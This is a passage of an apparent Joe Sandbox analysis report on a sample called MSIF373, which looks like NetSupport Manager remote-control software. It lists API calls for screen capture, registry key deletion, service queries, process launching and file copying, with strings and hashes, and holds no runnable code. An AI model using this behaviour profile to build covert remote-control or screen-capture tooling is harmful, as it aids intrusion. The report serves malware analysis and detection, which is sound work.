                                                                                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 005B673D
                                                                                          • SelectObject.GDI32(00000000,?), ref: 005B6748
                                                                                          • DeleteDC.GDI32(00000000), ref: 005B6755
                                                                                          • SelectObject.GDI32(00000000,?), ref: 005B675C
                                                                                          • DeleteDC.GDI32(00000000), ref: 005B6763
                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 005B6768
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Object$Select$CompatibleCreate$Delete$BitmapRelease
                                                                                          • String ID:
                                                                                          APIs
                                                                                          • IsDlgButtonChecked.USER32(?,00000428), ref: 005D4604
                                                                                          • EndDialog.USER32(?,00000428), ref: 005D4617
                                                                                          • GetDlgItem.USER32(?,00000427), ref: 005D4635
                                                                                          • GetDlgItem.USER32(?,00000428), ref: 005D463F
                                                                                          • SetForegroundWindow.USER32(?), ref: 005D4664
                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 005D4681
                                                                                          • EnableWindow.USER32(?,00000000), ref: 005D468D
                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 005D469C
                                                                                          • ShowWindow.USER32(?,00000000), ref: 005D46A4
                                                                                          • GetDlgItem.USER32(?,00000426), ref: 005D46AE
                                                                                          • ShowWindow.USER32(00000000), ref: 005D46B1
                                                                                          • CheckDlgButton.USER32(?,00000428,00000001), ref: 005D46C7
                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 005D46D0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Window$EnableItemShow$Button$CheckCheckedDialogForeground
                                                                                          • String ID:
                                                                                          APIs
                                                                                          • GetDC.USER32(00000000), ref: 005B6798
                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 005B67B8
                                                                                          • SelectObject.GDI32(00000000,?), ref: 005B67C2
                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 005B67C8
                                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 005B67D6
                                                                                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 005B67E5
                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 005B67F0
                                                                                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 005B6816
                                                                                          • SelectObject.GDI32(00000000,?), ref: 005B6821
                                                                                          • DeleteDC.GDI32(00000000), ref: 005B682A
                                                                                          • SelectObject.GDI32(?,?), ref: 005B683A
                                                                                          • DeleteDC.GDI32(?), ref: 005B6840
                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 005B6845
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Object$Select$CompatibleCreate$Delete$BitmapRelease
                                                                                          • String ID:
                                                                                          APIs
                                                                                          • GetVersionExW.KERNEL32(0063BEF0,00000000), ref: 005C92E0
                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 005C931F
                                                                                            • Part of subcall function 005C37C0: RegQueryValueExW.ADVAPI32(00000000,?,?,00000000,00000000,00000000,?,00000000,752F55F0,?,005C9375,00000000,CSDVersion,00000000,00000000,?), ref: 005C37E0
                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 005C9528
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseOpenQueryValueVersion
                                                                                          • String ID: ($CSDVersion$CurrentBuild$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                                          APIs
                                                                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005E680D
                                                                                          • LoadLibraryA.KERNEL32(?), ref: 005E6886
                                                                                          • GetLastError.KERNEL32 ref: 005E6892
                                                                                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 005E68C5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                                                          • String ID: $
                                                                                          APIs
                                                                                          • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,DE64E134), ref: 005A868E
                                                                                          • OpenServiceW.ADVAPI32(00000000,?,00000001), ref: 005A86B1
                                                                                          • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?), ref: 005A86D4
                                                                                          • GetLastError.KERNEL32 ref: 005A86D8
                                                                                          • QueryServiceConfigW.ADVAPI32(?,00000000,?,?), ref: 005A8707
                                                                                          • GetLastError.KERNEL32 ref: 005A87EB
                                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 005A8821
                                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 005A882E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Service$CloseConfigErrorHandleLastOpenQuery$Manager
                                                                                          • String ID: /$QueryServiceConfig() failed! $ServicesActive
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: GlobalLock
                                                                                          • String ID: ..\CTL32\pcibmp.cpp$lpDIBHdr
                                                                                          APIs
                                                                                          • EnterCriticalSection.KERNEL32(?,DE64E134), ref: 00597099
                                                                                          • ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,DE64E134), ref: 005971D6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalEnterEnvironmentExpandSectionStrings
                                                                                          • String ID: ..\CTL32\Config.cpp$@$_present$buflen >= sizeof (TCHAR)
                                                                                          • API String ID: 1631139872-3711079296
                                                                                          • Opcode ID: d407b2e3e3968ff247beb14d07144ace533cb30f36c8e3ab359991f855311c47
                                                                                          • Instruction ID: 565d7698a2f82afe65c1ceac0bcdb86a0e0503df4b3fc9070b018eaf7b7b95ca
                                                                                          • Opcode Fuzzy Hash: d407b2e3e3968ff247beb14d07144ace533cb30f36c8e3ab359991f855311c47
                                                                                          • Instruction Fuzzy Hash: 58B1D67191421D9BCF24DF64CC89BEABBB5FF98310F14499AE81A97250E770AE40DBD0
                                                                                          APIs
                                                                                          • wsprintfW.USER32 ref: 00594A70
                                                                                          • wsprintfW.USER32 ref: 00594A83
                                                                                            • Part of subcall function 005B4990: RegOpenKeyExW.ADVAPI32(?,80000002,00000000,00596384,?,00000000,752F55F0,00000010,?,00596384,80000002,?,00020019), ref: 005B49AC
                                                                                            • Part of subcall function 005B49E0: RegCreateKeyExW.ADVAPI32(00000000,0002001F,00000000,00000000,80000001,?,005959EC,?,00000000,?,00000000,752F55F0,?,?,005959EC,80000001), ref: 005B4A0B
                                                                                          • RegDeleteKeyW.ADVAPI32(80000001,?), ref: 00594C2C
                                                                                          • RegSetValueExW.ADVAPI32(?,nssCurrConfig,00000000,00000001,?,?,?,?,0002001F,00000000,00000000,80000001,?,00020019), ref: 00594CD4
                                                                                            • Part of subcall function 005E7CA4: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,752F55F0,?,005B97EE,00000000,?,?), ref: 005E7CE9
                                                                                            • Part of subcall function 005B45B0: RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,005947BC,00000000,00000000), ref: 005B45F5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Valuewsprintf$AllocateCreateDeleteEnumHeapOpen
                                                                                          • String ID: %s\ConfigList\%s$@$CurrConfig$IsA()$e:\nsmsrc\nsm\1410\1410\ctl32\NSMString.h$nssCurrConfig
                                                                                          • API String ID: 1914631338-2895001147
                                                                                          • Opcode ID: 135273485f984f5e6c1e71871c86873d7dad1b60e68755a9504a456fedde9f59
                                                                                          • Instruction ID: aa775d54177fd8eb28b2aca1dfc3446d4aa3fe7de642303b4be2109711fa2de4
                                                                                          • Opcode Fuzzy Hash: 135273485f984f5e6c1e71871c86873d7dad1b60e68755a9504a456fedde9f59
                                                                                          • Instruction Fuzzy Hash: 7A8160B1900219AFDF24DB54CC95FEAB778FF85314F044199E609A7242EB70AE84CFA5
                                                                                          APIs
                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005AE7F3
                                                                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 005AE829
                                                                                          • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 005AE859
                                                                                          • VerQueryValueW.VERSION(00000000,\StringFileInfo\040904e4\ProductVersion,?,?,?,?,00000000,00000000), ref: 005AE87A
                                                                                          • VerQueryValueW.VERSION(00000000,\StringFileInfo\080904b0\ProductVersion,?,?,00000000,\StringFileInfo\040904e4\ProductVersion,?,?,?,?,00000000,00000000), ref: 005AE897
                                                                                          • VerQueryValueW.VERSION(00000000,\StringFileInfo\040904b0\ProductVersion,?,?,00000000,\StringFileInfo\080904b0\ProductVersion,?,?,00000000,\StringFileInfo\040904e4\ProductVersion,?,?,?,?,00000000,00000000), ref: 005AE8B4
                                                                                          Strings
                                                                                          • \StringFileInfo\040904b0\ProductVersion, xrefs: 005AE8AE
                                                                                          • \StringFileInfo\040904e4\ProductVersion, xrefs: 005AE874
                                                                                          • \StringFileInfo\080904b0\ProductVersion, xrefs: 005AE891
                                                                                          • \gdihook5.dll, xrefs: 005AE814
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: QueryValue$FileInfoVersion$DirectorySizeSystem
                                                                                          • String ID: \StringFileInfo\040904b0\ProductVersion$\StringFileInfo\040904e4\ProductVersion$\StringFileInfo\080904b0\ProductVersion$\gdihook5.dll
                                                                                          • API String ID: 2940572272-296312680
                                                                                          • Opcode ID: 270d710013cd075e8ddd728d170dac858c917f81193d488636adabdc7db59c69
                                                                                          • Instruction ID: 13f0292098e4b7aa5d93e177f19ba8eec67ef0e4273a8b8a02ebe8ef1ec36d26
                                                                                          • Opcode Fuzzy Hash: 270d710013cd075e8ddd728d170dac858c917f81193d488636adabdc7db59c69
                                                                                          • Instruction Fuzzy Hash: 3C51DAB1C003655ADB34AB618D476BF7AF4BFA5344F044469FC89A3141F635DE80C7A1
                                                                                          APIs
                                                                                          • GetCurrentDirectoryW.KERNEL32(00000100,0063CB80), ref: 005DE682
                                                                                          • PostMessageW.USER32(?,000003E1,?,00000000), ref: 005DEDE1
                                                                                          • DestroyWindow.USER32(?), ref: 005DEDEE
                                                                                          • Sleep.KERNEL32(000003E8), ref: 005DEE58
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CurrentDestroyDirectoryMessagePostSleepWindow
                                                                                          • String ID: Created main window %08x$Done:$Exit$OK$Restart$winexec.ok
                                                                                          • API String ID: 2846396082-3127719662
                                                                                          • Opcode ID: 7b5f66840a49288f67ba45a63d8612b2b5f4b992a8d545158982e6c31af8a5ac
                                                                                          • Instruction ID: 58960135b0f5fc6f7422d1e3e757d1bb92b5fb2b5562db82f1a38f34fcd91c45
                                                                                          • Opcode Fuzzy Hash: 7b5f66840a49288f67ba45a63d8612b2b5f4b992a8d545158982e6c31af8a5ac
                                                                                          • Instruction Fuzzy Hash: CC512B75D402119BCB30BB6CAC9BA693AA6FB41350B09452BF4869F3D1EB704980CBA1
                                                                                          APIs
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000100,?,?,?,?,?,?,?,?,?,?,?,?), ref: 005E0F96
                                                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 005E1037
                                                                                          • GetLastError.KERNEL32 ref: 005E104B
                                                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 005E10DA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$Copy$ErrorLastModuleName
                                                                                          • String ID: .new$Copy %s to %s$Copy failed - pcigina in use$pcigina
                                                                                          • API String ID: 2850203897-1136079111
                                                                                          • Opcode ID: 9a000248b8611d2f82c1274d8262b3fa31f75ce80306c4d27240a20f8a1d20d9
                                                                                          • Instruction ID: 61d2f1992c31491d0396c4614eb091939cb544ff2f2d116f7abc9d38473aae7e
                                                                                          • Opcode Fuzzy Hash: 9a000248b8611d2f82c1274d8262b3fa31f75ce80306c4d27240a20f8a1d20d9
                                                                                          • Instruction Fuzzy Hash: B04127B6A0021987CB34AB55CD56BEA77B5FF94304F0484A9EB4B972C1EA704E81CB90
                                                                                          APIs
                                                                                            • Part of subcall function 005DF030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 005DF04D
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF09D
                                                                                            • Part of subcall function 005DF030: wvsprintfW.USER32(?,?,00000000), ref: 005DF0BE
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF0D3
                                                                                          • RegOpenKeyW.ADVAPI32(80000002,00621B70,?), ref: 005D247C
                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000041), ref: 005D24AE
                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,000F003F,?), ref: 005D24ED
                                                                                          • RegDeleteValueW.ADVAPI32(?,00621B58), ref: 005D251E
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005D25A3
                                                                                          • RegEnumKeyW.ADVAPI32(?,00000001,?,00000041), ref: 005D25BA
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005D25D1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseEnumOpenwsprintf$DeleteLocalTimeValuewvsprintf
                                                                                          • String ID: HackNetMeeting
                                                                                          • API String ID: 1897349547-1163810582
                                                                                          • Opcode ID: fa2d758125f1263f30b4ebde6d1435fe301cdb8a572c49c6b1c01f60ca8e811e
                                                                                          • Instruction ID: 3100bd566df30aa1d5248c2fcbd51078d68231b32f5c9eb9a7b8fab45ad7ab5d
                                                                                          • Opcode Fuzzy Hash: fa2d758125f1263f30b4ebde6d1435fe301cdb8a572c49c6b1c01f60ca8e811e
                                                                                          • Instruction Fuzzy Hash: 76418471A00219AFDB24DB65DC56FEA7779FB58701F00809EB60997240DB70AE85CFA0
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(USER32), ref: 005AE5F9
                                                                                          • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesW), ref: 005AE61B
                                                                                          • EnumDisplaySettingsW.USER32(00000000,000000FF,?), ref: 005AE654
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 005AE65F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Library$AddressDisplayEnumFreeLoadProcSettings
                                                                                          • String ID: EnumDisplayDevicesW$USER32$gdihook5$pci gdihook5
                                                                                          • API String ID: 3246608883-4052134795
                                                                                          • Opcode ID: 10a9b9258b4bb03a73927befe05a261130166e90772657d62ca8c2bff03bbbea
                                                                                          • Instruction ID: 57943ad89204aa95665d1105a5d750f18f6257a6d45440062d7ff55e1034c1c9
                                                                                          • Opcode Fuzzy Hash: 10a9b9258b4bb03a73927befe05a261130166e90772657d62ca8c2bff03bbbea
                                                                                          • Instruction Fuzzy Hash: E9311971A0030967DB14AFA5AC9BFEE7BA9FF45760F040469F90DD71C1EE719A00CAA1
                                                                                          APIs
                                                                                          • GetCurrentDirectoryW.KERNEL32(00000100,0063CB80), ref: 005DE682
                                                                                          • PostMessageW.USER32(?,000003E1,?,00000000), ref: 005DEDE1
                                                                                          • DestroyWindow.USER32(?), ref: 005DEDEE
                                                                                          • Sleep.KERNEL32(000003E8), ref: 005DEE58
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CurrentDestroyDirectoryMessagePostSleepWindow
                                                                                          • String ID: Created main window %08x$Done:$Exit$OK$Restart$winexec.ok
                                                                                          APIs
                                                                                            • Part of subcall function 005C8BC0: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 005C8C1C
                                                                                            • Part of subcall function 005C8BC0: SHGetFolderPathW.SHFOLDER(00000000,00000026,00000000,00000000,?,?,?), ref: 005C8C5F
                                                                                            • Part of subcall function 005C8BC0: SHGetFolderPathW.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 005C8CB7
                                                                                          • wsprintfW.USER32 ref: 005CEDEC
                                                                                          • PlaySoundW.WINMM(?,?,?), ref: 005CEED8
                                                                                            • Part of subcall function 005C92B0: GetVersionExW.KERNEL32(0063BEF0,00000000), ref: 005C92E0
                                                                                            • Part of subcall function 005C92B0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 005C931F
                                                                                          • wsprintfW.USER32 ref: 005CEE43
                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,?,?), ref: 005CEE88
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 005CEEA0
                                                                                          • CloseHandle.KERNEL32(?), ref: 005CEEB3
                                                                                          • CloseHandle.KERNEL32(?), ref: 005CEEBC
                                                                                          Similarity
                                                                                          • API ID: CloseFolderHandlePathwsprintf$CreateFileModuleNameObjectOpenPlayProcessSingleSoundVersionWait
                                                                                          • String ID: %s %s$%sPlaySound.exe$D
                                                                                          APIs
                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Control\DeviceClasses,00000000,0002001F,?), ref: 005AB1F1
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005AB224
                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Enum,00000000,0002001F,?), ref: 005AB24B
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005AB278
                                                                                            • Part of subcall function 005AB0E0: RegOpenKeyExW.ADVAPI32(?,?,00000000,0002001F,?), ref: 005AB10B
                                                                                            • Part of subcall function 005AB0E0: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 005AB14B
                                                                                            • Part of subcall function 005AB0E0: RegEnumKeyExW.ADVAPI32(?,00000000,?,00000100,00000000,00000000,00000000,?), ref: 005AB196
                                                                                            • Part of subcall function 005AB0E0: RegCloseKey.ADVAPI32(?), ref: 005AB1A3
                                                                                            • Part of subcall function 005AB0E0: RegDeleteKeyW.ADVAPI32(?,?), ref: 005AB1AB
                                                                                          Strings
                                                                                          • {6B1D1EAB-FF54-4ee9-B9EE-E297404C12A5}, xrefs: 005AB254
                                                                                          • SYSTEM\CurrentControlSet\Enum, xrefs: 005AB241
                                                                                          • {7a0787c8-fa7e-4c06-861d-593b3129b14c}, xrefs: 005AB200
                                                                                          • RecurseDeleteKey FAILED (%d), xrefs: 005AB213, 005AB267
                                                                                          • SYSTEM\CurrentControlSet\Control\DeviceClasses, xrefs: 005AB1E7
                                                                                          • Failed to open key: HKLM\SYSTEM\CurrentControlSet\Control\DeviceClasses (%d), xrefs: 005AB229
                                                                                          Similarity
                                                                                          • API ID: CloseOpen$Enum$Delete
                                                                                          • String ID: Failed to open key: HKLM\SYSTEM\CurrentControlSet\Control\DeviceClasses (%d)$RecurseDeleteKey FAILED (%d)$SYSTEM\CurrentControlSet\Control\DeviceClasses$SYSTEM\CurrentControlSet\Enum${6B1D1EAB-FF54-4ee9-B9EE-E297404C12A5}${7a0787c8-fa7e-4c06-861d-593b3129b14c}
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(USER32,?,?,005AEA6F), ref: 0059ED89
                                                                                          • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 0059ED9D
                                                                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 0059EDAA
                                                                                          • GetProcAddress.KERNEL32(?,EnumDisplayDevicesW), ref: 0059EDB7
                                                                                          • GetProcAddress.KERNEL32(?,MonitorFromRect), ref: 0059EDC4
                                                                                          Similarity
                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetMonitorInfoW$MonitorFromRect$USER32
                                                                                          APIs
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 005B9091
                                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 005B90A1
                                                                                          • GlobalUnlock.KERNEL32(?), ref: 005B914E
                                                                                          • GlobalFree.KERNEL32(?), ref: 005B9155
                                                                                          • DeleteObject.GDI32(?), ref: 005B917C
                                                                                          Similarity
                                                                                          • API ID: Global$Object$DeleteFreeLockUnlock
                                                                                          • String ID:
                                                                                          APIs
                                                                                            • Part of subcall function 005C92B0: GetVersionExW.KERNEL32(0063BEF0,00000000), ref: 005C92E0
                                                                                            • Part of subcall function 005C92B0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 005C931F
                                                                                          • GetProcAddress.KERNEL32(?,GetDpiForWindow), ref: 005CAE46
                                                                                          • GetProcAddress.KERNEL32(?,GetDpiForSystem), ref: 005CAE67
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005CAE7C
                                                                                          • FreeLibrary.KERNEL32(?), ref: 005CAE87
                                                                                          • GetDC.USER32(?), ref: 005CAE92
